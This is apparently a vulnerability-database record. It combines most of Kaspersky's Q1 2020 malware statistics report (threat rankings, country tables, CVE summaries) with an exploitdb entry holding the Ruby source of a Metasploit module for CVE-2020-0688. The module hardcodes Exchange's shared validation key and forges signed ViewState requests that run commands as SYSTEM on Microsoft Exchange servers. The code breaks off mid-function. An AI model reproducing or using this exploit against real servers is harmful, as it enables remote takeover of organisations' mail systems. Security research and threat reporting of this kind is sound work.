Trojan-Ransom.AndroidOS.Svpeng.aj | 3.62 \n8 | Trojan-Ransom.AndroidOS.Svpeng.ah | 3.55 \n9 | Trojan-Ransom.AndroidOS.Congur.e | 3.32 \n10 | Trojan-Ransom.AndroidOS.Fusob.h | 3.17 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile products who were attacked by ransomware trojans._\n\nOver the past few quarters, the number of ransomware trojans detected has been gradually decreasing; all the same, we continue to detect quite a few infection attempts by this class of threats. The main contributors to the statistics were the Svpeng, Congur, and Small ransomware families.\n\n_Geography of mobile ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194659/sl_malware_report_07-en-mobile-ransom-map.png>)_\n\nTop 10 countries by share of users attacked by mobile ransomware trojans:\n\n| **Country*** | **%**** \n---|---|--- \n1 | USA | 0.26 \n2 | Kazakhstan | 0.25 \n3 | Iran | 0.16 \n4 | China | 0.09 \n5 | Saudi Arabia | 0.08 \n6 | Italy | 0.03 \n7 | Mexico | 0.03 \n8 | Canada | 0.03 \n9 | Indonesia | 0.03 \n10 | Switzerland | 0.03 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky mobile products (under 10,000)._ \n_** Unique users attacked by mobile ransomware trojans as a percentage of all users of Kaspersky mobile products in the country._\n\nThe leaders by number of users attacked by mobile ransomware trojans are Syria (0.28%), the United States (0.26%) and Kazakhstan (0.25%)\n\n## Attacks on Apple macOS\n\nIn Q1 2020, we detected not only new versions of common threats, but one new backdoor family, whose first member was Backdoor.OSX.Capip.a. The malware's operating principle is simple: it calls the C&amp;C for a shell script, which it then downloads and executes.\n\n### Top 20 threats to macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 19.27 \n2 | AdWare.OSX.Pirrit.j | 10.34 \n3 | AdWare.OSX.Cimpli.k | 6.69 \n4 | AdWare.OSX.Ketin.h | 6.27 \n5 | AdWare.OSX.Pirrit.aa | 5.75 \n6 | AdWare.OSX.Pirrit.o | 5.74 \n7 | AdWare.OSX.Pirrit.x | 5.18 \n8 | AdWare.OSX.Spc.a | 4.56 \n9 | AdWare.OSX.Cimpli.f | 4.25 \n10 | AdWare.OSX.Bnodlero.t | 4.08 \n11 | AdWare.OSX.Bnodlero.x | 3.74 \n12 | Hoax.OSX.SuperClean.gen | 3.71 \n13 | AdWare.OSX.Cimpli.h | 3.37 \n14 | AdWare.OSX.Pirrit.v | 3.30 \n15 | AdWare.OSX.Amc.c | 2.98 \n16 | AdWare.OSX.MacSearch.d | 2.85 \n17 | RiskTool.OSX.Spigot.a | 2.84 \n18 | AdWare.OSX.Pirrit.s | 2.80 \n19 | AdWare.OSX.Ketin.d | 2.76 \n20 | AdWare.OSX.Bnodlero.aq | 2.70 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked_\n\nThe top 20 threats for macOS did not undergo any major changes in Q1 2020. The adware trojan Shlayer.a (19.27%) still tops the leaderboard, followed by objects that Shlayer itself loads into the infected system, in particular, numerous adware apps from the Pirrit family.\n\nInterestingly, the unwanted program Hoax.OSX.SuperClean.gen landed in 12th place on the list. Like other Hoax-type programs, it is distributed under the guise of a system cleanup app, and immediately after installation, scares the user with problems purportedly found in the system, such as gigabytes of trash on the hard drive.\n\n### Threat geography\n\n| **Country*** | **%**** \n---|---|--- \n1 | Spain | 7.14 \n2 | France | 6.94 \n3 | Italy | 5.94 \n4 | Canada | 5.58 \n5 | USA | 5.49 \n6 | Russia | 5.10 \n7 | India | 4.88 \n8 | Mexico | 4.78 \n9 | Brazil | 4.65 \n10 | Belgium | 4.65 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 5,000)_ \n_** Unique users who encountered macOS threats as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nThe leading countries, as in previous quarters, were Spain (7.14%), France (6.94%) and Italy (5.94%). The main contributors to the number of detections in these countries were the familiar Shlayer trojan and adware apps from the Pirrit family.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2020, the share of IP addresses from which attempts were made to attack Kaspersky telnet traps increased significantly. Their share amounted to 81.1% of all IP addresses from which attacks were carried out, while SSH traps accounted for slightly less than 19%. \n \nSSH | 18.9% \nTelnet | 81.1% \n \n_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2020_\n\nIt was a similar situation with control sessions: attackers often controlled infected traps via telnet. \n \nSSH | 39.62% \nTelnet | 60.38% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2020_\n\n### Telnet-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky telnet traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194811/sl_malware_report_09-en-telnet-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were carried out on Kaspersky telnet traps.**\n\nCountry* | **%** \n---|--- \nChina | 13.04 \nEgypt | 11.65 \nBrazil | 11.33 \nVietnam | 7.38 \nTaiwan | 6.18 \nRussia | 4.38 \nIran | 3.96 \nIndia | 3.14 \nTurkey | 3.00 \nUSA | 2.57 \n \n_ _ \nFor several quarters in a row, the leading country by number of attacking bots has been China: in Q1 2020 its share stood at 13.04%. As before, it is followed by Egypt (11.65%) and Brazil (11.33%).\n\n### SSH-based attacks\n\n \n\n_Geography of device IP addresses where attacks at Kaspersky SSH traps originated, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194853/sl_malware_report_10-en-ssh-geo.png>)_\n\n**Top 10 countries by location of devices from which attacks were made on Kaspersky SSH traps.**\n\nCountry* | % \n---|--- \nChina | 14.87 \nVietnam | 11.58 \nUSA | 7.03 \nEgypt | 6.82 \nBrazil | 5.79 \nRussia | 4.66 \nIndia | 4.16 \nGermany | 3.64 \nThailand | 3.44 \nFrance | 2.83 \n \nIn Q1 2020, China (14.87%), Vietnam (11.58%) and the US (7.03%) made up the top three countries by number of unique IPs from which attacks on SSH traps originated.\n\n### Threats loaded into honeypots\n\n**Verdict** | %* \n---|--- \nTrojan-Downloader.Linux.NyaDrop.b | 64.35 \nBackdoor.Linux.Mirai.b | 16.75 \nBackdoor.Linux.Mirai.ba | 6.47 \nBackdoor.Linux.Gafgyt.a | 4.36 \nBackdoor.Linux.Gafgyt.bj | 1.30 \nTrojan-Downloader.Shell.Agent.p | 0.68 \nBackdoor.Linux.Mirai.c | 0.64 \nBackdoor.Linux.Hajime.b | 0.46 \nBackdoor.Linux.Mirai.h | 0.40 \nBackdoor.Linux.Gafgyt.av | 0.35 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices following a successful attack._\n\nIn Q1 2020, attackers most often downloaded the minimalistic trojan loader NyaDrop (64.35%), whose executable file does not exceed 500 KB. Threats from the Mirai family traditionally dominated: its members claimed four places in our top 10. These malicious programs will continue to rule the world of IoT threats for a long time to come, at least until the appearance of a more advanced (and publicly available) DDoS bot.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q1 2020, Kaspersky solutions blocked attempts to launch one or several types of malware designed to steal money from bank accounts on the computers of 249,748 users.\n\n_Number of unique users attacked by financial malware, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13194937/sl_malware_report_11-en-finance.png>)_\n\n**Attack geography**\n\nTo assess and compare the risk of being infected by banking trojans and ATM/POS malware in various countries, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195018/sl_malware_report_12-en-finance-map.png>)_\n\n**Top 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Uzbekistan | 10.5 \n2 | Tajikistan | 6.9 \n3 | Turkmenistan | 5.5 \n4 | Afghanistan | 5.1 \n5 | Yemen | 3.1 \n6 | Kazakhstan | 3.0 \n7 | Guatemala | 2.8 \n8 | Syria | 2.4 \n9 | Sudan | 2.1 \n10 | Kyrgyzstan | 2.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**Top 10 banking malware families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | Emotet | Backdoor.Win32.Emotet | 21.3 | \n2 | Zbot | Trojan.Win32.Zbot | 20.8 | \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 17.2 | \n4 | RTM | Trojan-Banker.Win32.RTM | 12.3 | \n5 | Nimnul | Virus.Win32.Nimnul | 3.6 | \n6 | Trickster | Trojan.Win32.Trickster | 3.6 | \n7 | Neurevt | Trojan.Win32.Neurevt | 3.3 | \n8 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.3 | \n9 | Danabot | Trojan-Banker.Win32.Danabot | 2.0 | \n10 | Nymaim | Trojan.Win32.Nymaim | 1.9 | \n \n_** Unique users attacked by this malware family as a __percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly highlights\n\nRansomware attacks on organizations, as well as on city and municipal networks, did not ease off. Given how lucrative they are for cybercriminals, there is no reason why this trend of several years should cease.\n\nMore and more ransomware is starting to supplement encryption with data theft. To date, this tactic has been adopted by distributors of ransomware families, including Maze, REvil/Sodinokibi, DoppelPaymer and JSWorm/Nemty/Nefilim. If the victim refuses to pay the ransom for decryption (because, say, the data was recovered from a backup copy), the attackers threaten to put the stolen confidential information in the public domain. Such threats are sometimes empty, but not always: the authors of several ransomware programs have set up websites that do indeed publish the data of victim organizations.\n\n### Number of new modifications\n\nIn Q1 2020, we detected five new ransomware families and 5,225 new modifications of these malware programs.\n\n_Number of new ransomware modifications detected, Q1 2019 \u2013 Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195150/sl_malware_report_13-ransomware-novye-modifikacii.png>)_\n\n### Number of users attacked by ransomware trojans\n\nIn Q1 2020, Kaspersky products and technologies protected 178,922 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13195235/sl_malware_report_14-en-ransomware-atakovannye-polzovateli.png>)_\n\n### Attack geography\n\n \n\n_Geography of attacks by ransomware trojans, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201512/sl_malware_report_15-en-ransomware-map.png>)_\n\n**Top 10 countries attacked by ransomware trojans**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Bangladesh | 6.64 \n2 | Uzbekistan | 1.98 \n3 | Mozambique | 1.77 \n4 | Ethiopia | 1.67 \n5 | Nepal | 1.34 \n6 | Afghanistan | 1.31 \n7 | Egypt | 1.21 \n8 | Ghana | 0.83 \n9 | Azerbaijan | 0.81 \n10 | Serbia | 0.74 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by ransomware trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware trojans\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 19.03 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Gen | 16.71 | \n3 | (generic verdict) | Trojan-Ransom.Win32.Phny | 16.22 | \n4 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 7.73 | \n5 | Stop | Trojan-Ransom.Win32.Stop | 6.62 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.28 | \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 4.15 | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom,\n\nTrojan-Ransom.Win32.PolyRansom | 2.96 | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 2.02 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Generic | 1.56 | \n| | | | | \n \n_* Unique Kaspersky users __attacked by the specified family of ransomware trojans as a percentage of all users attacked by ransomware trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q1 2020, Kaspersky solutions detected 192,036 new miner modifications.\n\n_Number of new miner modifications, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201558/sl_malware_report_16-en-miner-kolichestvo-novyh-modifikacij.png>)_\n\n### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 518,857 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201637/sl_malware_report_17-en-miner-kolichestvo-polzovatelej-atakovannyh-majnerami.png>)_\n\n### Attack geography\n\n \n\n_Geography of miner attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201719/sl_malware_report_18-en-miner-map.png>)_\n\n**Top 10 countries attacked by miners**\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 6.72 \n2 | Ethiopia | 4.90 \n3 | Tanzania | 3.26 \n4 | Sri Lanka | 3.22 \n5 | Uzbekistan | 3.10 \n6 | Rwanda | 2.56 \n7 | Vietnam | 2.54 \n8 | Kazakhstan | 2.45 \n9 | Mozambique | 1.96 \n10 | Pakistan | 1.67 \n \n_* Excluded are countries with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyberattacks\n\nWe already noted that Microsoft Office vulnerabilities are the most common ones. Q1 2020 was no exception: the share of exploits for these vulnerabilities grew to 74.83%. The most popular vulnerability in Microsoft Office was [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), which is related to a stack overflow error in the Equation Editor component. Hard on its heels was [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), which is used to embed a malicious script in an OLE object inside an Office document. Several other vulnerabilities, such as [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>), were also popular with attackers. In the absence of security updates for Microsoft Office, these vulnerabilities are successfully exploited and the user's system becomes infected.\n\nIn second place were exploits for vulnerabilities in Internet browsers (11.06%). In Q1, cybercriminals attacked a whole host of browsers, including Microsoft Internet Explorer, Google Chrome, and Mozilla Firefox. What's more, some of the vulnerabilities were used in APT attacks, such as [CVE-2020-0674](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0674>), which is associated with the incorrect handling of objects in memory in an outdated version of the JScript scripting engine in Internet Explorer, leading to code execution. Another example is the previously identified [CVE-2019-17026](<https://nvd.nist.gov/vuln/detail/CVE-2019-17026>), a data type mismatch vulnerability in Mozilla Firefox's JIT compiler, which also leads to remote code execution. In the event of a successful attack, both browser exploits cause a malware infection. The researchers also detected a targeted attack against Google Chrome exploiting the RCE vulnerability [CVE-2020-6418](<https://nvd.nist.gov/vuln/detail/CVE-2020-6418>) in the JavaScript engine; in addition, the dangerous RCE vulnerability [CVE-2020-0767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0767>) was detected in a component of the ChakraCore scripting engine used by Microsoft Edge. Although modern browsers have their own protection mechanisms, cybercriminals are forever finding ways around them, very often using chains of exploits to do so. Therefore, it is vital to keep the operating system and software up to date at all times.\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13201812/sl_malware_report_19-vuln.png>)_\n\nThis quarter, a wide range of critical vulnerabilities were detected in operating systems and their components.\n\n * [CVE-2020-0601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0601>) is a vulnerability that exploits an error in the core cryptographic library of Windows, in a certificate validation algorithm that uses elliptic curves. This vulnerability enables the use of fake certificates that the system recognizes as legitimate.\n * [CVE-2020-0729](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0729>) is a vulnerability in processing LNK files in Windows, which allows remote code execution if the user opens a malicious shortcut.\n * [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) is the result of a default configuration error in Microsoft Exchange Server, whereby the same cryptographic keys are used to sign and encrypt serialized ASP.NET ViewState data, enabling attackers to execute their own code on the server side with system rights.\n\nVarious network attacks on system services and network protocols were as popular as ever with attackers. We continue to detect attempts at exploiting vulnerabilities in the SMB protocol using EternalBlue, EternalRomance and similar sets of exploits. In Q1 2020, the new vulnerability [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) (SMBGhost) was detected in the SMBv3 network protocol, leading to remote code execution, in which regard the attacker does not even need to know the username/password combination (since the error occurs before the authentication stage); however, it is present only in Windows 10. In Remote Desktop Gateway there were found two critical vulnerabilities ([CVE-2020-0609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0609>) and [CVE-2020-0610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0610>)) enabling an unauthorized user to execute remote code in the target system. In addition, there were more frequent attempts to brute-force passwords to Remote Desktop Services and Microsoft SQL Server via the SMB protocol as well.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2020, Kaspersky solutions defeated 726,536,269 attacks launched from online resources located in 203 countries worldwide. As many as 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202037/sl_malware_report_20-en-web-source.png>)_\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country, we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware class_**_;_ it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Bulgaria | 13.89 \n2 | Tunisia | 13.63 \n3 | Algeria | 13.15 \n4 | Libya | 12.05 \n5 | Bangladesh | 9.79 \n6 | Greece | 9.66 \n7 | Latvia | 9.64 \n8 | Somalia | 9.20 \n9 | Philippines | 9.11 \n10 | Morocco | 9.10 \n11 | Albania | 9.09 \n12 | Taiwan, Province of China | 9.04 \n13 | Mongolia | 9.02 \n14 | Nepal | 8.69 \n15 | Indonesia | 8.62 \n16 | Egypt | 8.61 \n17 | Georgia | 8.47 \n18 | France | 8.44 \n19 | Palestine | 8.34 \n20 | Qatar | 8.30 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to providing statistical data._\n\nOn average, 6.56% of Internet user' computers worldwide experienced at least one **Malware-class** attack.\n\n_Geography of malicious web-based attacks, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202126/sl_malware_report_21-en-web-map.png>)_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. It takes into account malicious programs that were found directly on users' computers or removable media connected to computers (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2020, our File Anti-Virus registered **164,653,290** malicious and potentially unwanted objects.** **\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal-computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 52.20 \n2 | Tajikistan | 47.14 \n3 | Uzbekistan | 45.16 \n4 | Ethiopia | 45.06 \n5 | Myanmar | 43.14 \n6 | Bangladesh | 42.14 \n7 | Kyrgyzstan | 41.52 \n8 | Yemen | 40.88 \n9 | China | 40.67 \n10 | Benin | 40.21 \n11 | Mongolia | 39.58 \n12 | Algeria | 39.55 \n13 | Laos | 39.21 \n14 | Burkina Faso | 39.09 \n15 | Malawi | 38.42 \n16 | Sudan | 38.34 \n17 | Rwanda | 37.84 \n18 | Iraq | 37.82 \n19 | Vietnam | 37.42 \n20 | Mauritania | 37.26 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers _**_Malware-class_**_ local threats were blocked as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2020 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/13202208/sl_malware_report_22-en-local-map.png>)_\n\nOverall, 19.16% of user computers globally faced at least one **Malware**-class local threat during Q1.", "modified": "2020-05-20T10:00:43", "published": "2020-05-20T10:00:43", "id": "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "href": "https://securelist.com/it-threat-evolution-q1-2020-statistics/96959/", "type": "securelist", "title": "IT threat evolution Q1 2020. Statistics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2020-03-05T13:38:14", "description": "", "published": "2020-03-05T00:00:00", "type": "exploitdb", "title": "Exchange Control Panel - Viewstate Deserialization (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-0688"], "modified": "2020-03-05T00:00:00", "id": "EDB-ID:48168", "href": "https://www.exploit-db.com/exploits/48168", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'bindata'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n # include Msf::Auxiliary::Report\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n\r\n DEFAULT_VIEWSTATE_GENERATOR = 'B97B4E27'\r\n VALIDATION_KEY = \"\\xcb\\x27\\x21\\xab\\xda\\xf8\\xe9\\xdc\\x51\\x6d\\x62\\x1d\\x8b\\x8b\\xf1\\x3a\\x2c\\x9e\\x86\\x89\\xa2\\x53\\x03\\xbf\"\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exchange Control Panel Viewstate Deserialization',\r\n 'Description' => %q{\r\n This module exploits a .NET serialization vulnerability in the\r\n Exchange Control Panel (ECP) web page. The vulnerability is due to\r\n Microsoft Exchange Server not randomizing the keys on a\r\n per-installation basis resulting in them using the same validationKey\r\n and decryptionKey values. With knowledge of these, values an attacker\r\n can craft a special viewstate to cause an OS command to be executed\r\n by NT_AUTHORITY\\SYSTEM using .NET deserialization.\r\n },\r\n 'Author' => 'Spencer McIntyre',\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0688'],\r\n ['URL', 'https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys'],\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [ 'Windows (x86)', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows (x64)', { 'Arch' => ARCH_X64 } ],\r\n [ 'Windows (cmd)', { 'Arch' => ARCH_CMD, 'Space' => 450 } ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 1,\r\n 'DisclosureDate' => '2020-02-11',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [ CRASH_SAFE, ],\r\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\r\n 'Reliability' => [ REPEATABLE_SESSION, ],\r\n }\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(443),\r\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n\r\n register_advanced_options([\r\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\r\n ])\r\n end\r\n\r\n def check\r\n state = get_request_setup\r\n viewstate = state[:viewstate]\r\n return CheckCode::Unknown if viewstate.nil?\r\n\r\n viewstate = Rex::Text.decode_base64(viewstate)\r\n body = viewstate[0...-20]\r\n signature = viewstate[-20..-1]\r\n\r\n unless generate_viewstate_signature(state[:viewstate_generator], state[:session_id], body) == signature\r\n return CheckCode::Safe\r\n end\r\n\r\n # we've validated the signature matches based on the data we have and thus\r\n # proven that we are capable of signing a viewstate ourselves\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def generate_viewstate(generator, session_id, cmd)\r\n viewstate = ::Msf::Util::DotNetDeserialization.generate(cmd)\r\n signature = generate_viewstate_signature(generator, session_id, viewstate)\r\n Rex::Text.encode_base64(viewstate + signature)\r\n end\r\n\r\n def generate_viewstate_signature(generator, session_id, viewstate)\r\n mac_key_bytes = Rex::Text.hex_to_raw(generator).unpack('I<').pack('I>')\r\n mac_key_bytes << Rex::Text.to_unicode(session_id)\r\n OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha1'), VALIDATION_KEY, viewstate + mac_key_bytes)\r\n end\r\n\r\n def exploit\r\n state = get_request_setup\r\n\r\n # the major limit is the max length of a GET request, the command will be\r\n # XML escaped and then base64 encoded which both increase the size\r\n if target.arch.first == ARCH_CMD\r\n execute_command(payload.encoded, opts={state: state})\r\n else\r\n cmd_target = targets.select { |target| target.arch.include? ARCH_CMD }.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space'], delay: datastore['CMDSTAGER::DELAY'], state: state})\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts)\r\n state = opts[:state]\r\n viewstate = generate_viewstate(state[:viewstate_generator], state[:session_id], cmd)\r\n 5.times do |iteration|\r\n # this request *must* be a GET request, can't use POST to use a larger viewstate\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => state[:cookies].join(''),\r\n 'agent' => state[:user_agent],\r\n 'vars_get' => {\r\n '__VIEWSTATE' => viewstate,\r\n '__VIEWSTATEGENERATOR' => state[:viewstate_generator]\r\n }\r\n })\r\n break\r\n rescue Rex::ConnectionError, Errno::ECONNRESET => e\r\n vprint_warning('Encountered a connection error while sending the command, sleeping before retrying')\r\n sleep iteration\r\n end\r\n end\r\n\r\n def get_request_setup\r\n # need to use a newer default user-agent than what Metasploit currently provides\r\n # see: https://docs.microsoft.com/en-us/microsoft-edge/web-platform/user-agent-string\r\n user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.74 Safari/537.36 Edg/79.0.309.43'\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'owa', 'auth.owa'),\r\n 'method' => 'POST',\r\n 'agent' => user_agent,\r\n 'vars_post' => {\r\n 'password' => datastore['PASSWORD'],\r\n 'flags' => '4',\r\n 'destination' => full_uri(normalize_uri(target_uri.path, 'owa')),\r\n 'username' => datastore['USERNAME']\r\n }\r\n })\r\n fail_with(Failure::Unreachable, 'The initial HTTP request to the server failed') if res.nil?\r\n cookies = [res.get_cookies]\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'ecp', 'default.aspx'),\r\n 'cookie' => res.get_cookies,\r\n 'agent' => user_agent\r\n })\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the __VIEWSTATEGENERATOR page') unless res && res.code == 200\r\n cookies << res.get_cookies\r\n\r\n viewstate_generator = res.body.scan(/id=\"__VIEWSTATEGENERATOR\"\\s+value=\"([a-fA-F0-9]{8})\"/).flatten[0]\r\n if viewstate_generator.nil?\r\n print_warning(\"Failed to find the __VIEWSTATEGENERATOR, using the default value: #{DEFAULT_VIEWSTATE_GENERATOR}\")\r\n viewstate_generator = DEFAULT_VIEWSTATE_GENERATOR\r\n else\r\n vprint_status(\"Recovered the __VIEWSTATEGENERATOR: #{viewstate_generator}\")\r\n end\r\n\r\n viewstate = res.body.scan(/id=\"__VIEWSTATE\"\\s+value=\"([a-zA-Z0-9\\+\\/]+={0,2})\"/).flatten[0]\r\n if viewstate.nil?\r\n vprint_warning('Failed to find the __VIEWSTATE value')\r\n end\r\n\r\n session_id = res.get_cookies.scan(/ASP\\.NET_SessionId=([\\w\\-]+);/).flatten[0]\r\n if session_id.nil?\r\n fail_with(Failure::UnexpectedReply, 'Failed to get the ASP.NET_SessionId from the response cookies')\r\n end\r\n 